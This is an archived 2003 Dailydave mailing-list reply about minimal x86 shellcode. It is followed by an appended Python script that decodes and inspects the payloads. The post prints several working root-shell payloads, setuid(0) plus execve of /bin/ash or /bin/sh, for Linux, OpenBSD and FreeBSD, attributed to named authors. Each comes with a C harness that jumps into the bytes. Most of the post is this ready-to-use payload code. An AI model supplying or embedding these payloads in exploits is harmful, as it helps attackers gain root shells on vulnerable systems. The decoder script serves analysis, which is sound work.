Dailydave mailing list archives
Re: Shellcode Size
From: Max Vision <vision () whitehats com>
Date: Mon, 24 Nov 2003 13:48:48 -0800 (PST)
On Sun, 23 Nov 2003, David Maynor wrote:
> What is the smallest shellcode anybody has written to spawn a simple shell with uid 0. I am down to 31 bytes and I was wondering if anybody has smaller.
I would swear someone sent me obscenely small "private" shellcode one of the many previous times this question has come up (years ago), but I can't find it. Anyhow, how about these 29 bytes, untested:

    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
    "\x2f\x61\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\xcd\x80";

That's assuming you're talking linux x86. I just took zasta's 21 byte shellcode and prepended setuid(0). I think it takes 10 bytes to do setreuid(0,0), correct me if I'm wrong.

    "\x31\xc0\x89\xc3\x89\xc1\xb0\x47\xcd\x80" /* setregid(0, 0) */

Here is zasta's code, null argv so uses ash...

/* 21 byte execve("/bin/ash",0,0); shellcode for linux x86
 * by zasta (zasta () darkircop org)
 */
#include <unistd.h>
#include <stdio.h>

char shellcode[] =
    "\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
    "\x2f\x61\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\xcd\x80";

void code() {
    __asm__("xor %ecx,%ecx\n\t"      /* ecx = 0            (argv)            */
            "mul %ecx\n\t"           /* eax = edx = 0      (envp, terminator) */
            "addb $0xb,%al\n\t"      /* eax = 11 = __NR_execve, no NUL bytes  */
            "push %edx\n\t"          /* NUL terminator for the path           */
            "push $0x6873612f\n\t"   /* "/ash"                                */
            "push $0x6e69622f\n\t"   /* "/bin"                                */
            "mov %esp,%ebx\n\t"      /* ebx -> "/bin/ash"                     */
            "int $0x80");
}

/* test harness: jump into the byte string (the original had this at file scope) */
int main() {
    void (*ptr)() = (void (*)()) &shellcode[0];
    (*ptr)();
    return 0;
}

The next smallest shellcodes I have seen are 23 bytes each (linux/freebsd/openbsd):

/************************************************************
 * Linux 23 byte execve code. Greetz to preedator           *
 * marcetam                                                 *
 * admin () marcetam net                                    *
 ************************************************************/
#include <stdio.h>
#include <string.h>

/* renamed from "linux": gcc predefines that identifier as a macro on Linux */
char linux_execve[]=
    "\x99"                  /* cdq               */
    "\x52"                  /* push %edx         */
    "\x68\x2f\x2f\x73\x68"  /* push $0x68732f2f  */
    "\x68\x2f\x62\x69\x6e"  /* push $0x6e69622f  */
    "\x89\xe3"              /* mov %esp,%ebx     */
    "\x52"                  /* push %edx         */
    "\x54"                  /* push %esp         */
    "\x54"                  /* push %esp         */
    "\x59"                  /* pop %ecx          */
    "\x6a\x0b"              /* push $0x0b        */
    "\x58"                  /* pop %eax          */
    "\xcd\x80";             /* int $0x80         */

int main(){
    void (*run)()=(void *)linux_execve;
    printf("%zu bytes \n",strlen(linux_execve));
    run();
}

/************************************************************
 * OpenBSD 23 byte execve code. Greetz to preedator         *
 * marcetam                                                 *
 * admin () marcetam net                                    *
 ************************************************************/
#include <stdio.h>
#include <string.h>

char open_bsd[]=
    "\x99"                  /* cdq               */
    "\x52"                  /* push %edx         */
    "\x68\x6e\x2f\x73\x68"  /* push $0x68732f6e  */
    "\x68\x2f\x2f\x62\x69"  /* push $0x69622f2f  */
    "\x89\xe3"              /* mov %esp,%ebx     */
    "\x52"                  /* push %edx         */
    "\x54"                  /* push %esp         */
    "\x53"                  /* push %ebx         */
    "\x53"                  /* push %ebx         */
    "\x6a\x3b"              /* push $0x3b        */
    "\x58"                  /* pop %eax          */
    "\xcd\x80";             /* int $0x80         */

int main(){
    void (*run)()=(void *)open_bsd;
    printf("%zu bytes\n",strlen(open_bsd));
    run();
}

/****************************************************************************
 * FreeBSD 23 byte execve code. Greetz to anathema, the first who published *
 * this way of writing shellcodes.                                          *
 * greetz to preedator marcetam                                             *
 * admin () marcetam net                                                    *
 ****************************************************************************/
#include <stdio.h>
#include <string.h>

char fbsd_execve[]=
    "\x99"                  /* cdq                   */
    "\x52"                  /* push %edx             */
    "\x68\x6e\x2f\x73\x68"  /* push $0x68732f6e      */
    "\x68\x2f\x2f\x62\x69"  /* push $0x69622f2f      */
    "\x89\xe3"              /* movl %esp,%ebx        */
    "\x51"                  /* push %ecx - or %edx :) */
    "\x52"                  /* push %edx - or %ecx :) */
    "\x53"                  /* push %ebx             */
    "\x53"                  /* push %ebx             */
    "\x6a\x3b"              /* push $0x3b            */
    "\x58"                  /* pop %eax              */
    "\xcd\x80";             /* int $0x80             */

int main() {
    void (*run)()=(void *)fbsd_execve;
    printf("%zu bytes \n",strlen(fbsd_execve));
}

Max

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave
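A small triage script for the literals in this thread, added here as an example and not part of any post: it decodes the C "\xNN" fragments to verify the stated byte counts, flags NUL bytes (the reason the stubs above load %eax with addb or push/pop rather than a plain mov), counts int $0x80 instructions, and recovers the path assembled by the push $imm32 sequence. MOV_WITH_NULS is a constructed counter-example; the push scan is a heuristic that is only sound for tiny straight-line stubs like these.

```python
"""Triage helpers for the C-escaped x86 shellcode literals posted in this thread."""
import re

_HEX = re.compile(r'\\x([0-9a-fA-F]{2})')          # one "\xNN" escape
_FRAG = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')  # one quoted fragment

def c_literal_bytes(literal: str) -> bytes:
    """Decode the quoted hex-escape fragments of a C literal; comments and ';' are ignored."""
    return bytes(int(h, 16) for frag in _FRAG.findall(literal) for h in _HEX.findall(frag))

def pushed_string(raw: bytes) -> str:
    """Recover the string built on the stack by consecutive push $imm32 (opcode 0x68).

    Linear scan, not a disassembler: fine for these straight-line stubs only.
    Each push lowers %esp, so the last immediate pushed is the start of the string.
    """
    imms, i = [], 0
    while i < len(raw):
        if raw[i] == 0x68 and i + 5 <= len(raw):
            imms.append(raw[i + 1:i + 5])
            i += 5
        else:
            i += 1
    return b"".join(reversed(imms)).decode("latin-1")

def summarize(literal: str) -> dict:
    raw = c_literal_bytes(literal)
    return {
        "length": len(raw),
        "nul_offsets": [i for i, b in enumerate(raw) if b == 0],  # NULs break strcpy-style delivery
        "int80_count": raw.count(b"\xcd\x80"),                   # Linux/BSD syscall gates
        "path": pushed_string(raw),
    }

# Literals copied from the thread above.
MAX_29 = r'''"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
"\x2f\x61\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\xcd\x80";'''
ZASTA_21 = r'"\x31\xc9\xf7\xe1\x04\x0b\x52\x68" "\x2f\x61\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\xcd\x80";'
SETREGID_10 = r'"\x31\xc0\x89\xc3\x89\xc1\xb0\x47\xcd\x80" /* setregid(0, 0) */'
MARCETAM_LINUX_23 = r'''"\x99" "\x52" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3"
"\x52" "\x54" "\x54" "\x59" "\x6a\x0b" "\x58" "\xcd\x80";'''
# Constructed: mov $0xb,%eax encodes the immediate as 32 bits and so carries three NULs.
MOV_WITH_NULS = r'"\xb8\x0b\x00\x00\x00"'

if __name__ == "__main__":
    for name in ("MAX_29", "ZASTA_21", "SETREGID_10", "MARCETAM_LINUX_23", "MOV_WITH_NULS"):
        print(name, summarize(globals()[name]))
```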